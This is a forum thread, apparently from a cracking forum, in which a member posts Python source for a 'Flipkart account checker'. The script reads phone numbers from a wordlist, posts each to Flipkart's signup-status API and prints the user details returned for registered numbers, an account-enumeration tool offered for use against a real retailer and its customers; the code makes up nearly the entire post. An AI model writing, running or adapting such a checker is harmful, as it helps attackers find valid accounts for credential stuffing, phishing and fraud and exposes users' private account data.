• 🌙 Community Spirit

    Ramadan Mubarak! To honor this month, Crax has paused NSFW categories. Wishing you peace and growth!

Source Code Flipkart account checker. (1 Viewer)

Currently reading:
 Source Code Flipkart account checker. (1 Viewer)

Recently searched:

alex059

Member
LV
1
Joined
Jul 30, 2023
Threads
14
Likes
2
Awards
4
Credits
3,128©
Cash
0$
import requests, json

url = 'https://www.flipkart.com/api/6/user/signup/status'
headers = {"Origin": "https://www.flipkart.com", "X-user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 FKUA/website/41/website/Desktop"}

with open("wordlist.txt") as numbers:
for number in numbers:
number = number.strip() # Remove leading/trailing whitespace characters (including newline)
data = "{\"loginId\":[\"+" + number + "\"],\"supportAllStates\":true}"
response = requests.post(url, data=data, headers=headers)

if response.status_code == 200:
api_data = response.json()
if api_data and 'RESPONSE' in api_data and 'userDetails' in api_data['RESPONSE']:
status = api_data['RESPONSE']['userDetails']
print(status)
else:
print(f"Error: Invalid API response for {number}.")
else:
print(f"Error: Failed to retrieve PayLater status for {number}.")
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Tips
Recently searched:

Similar threads

Users who are viewing this thread

Top Bottom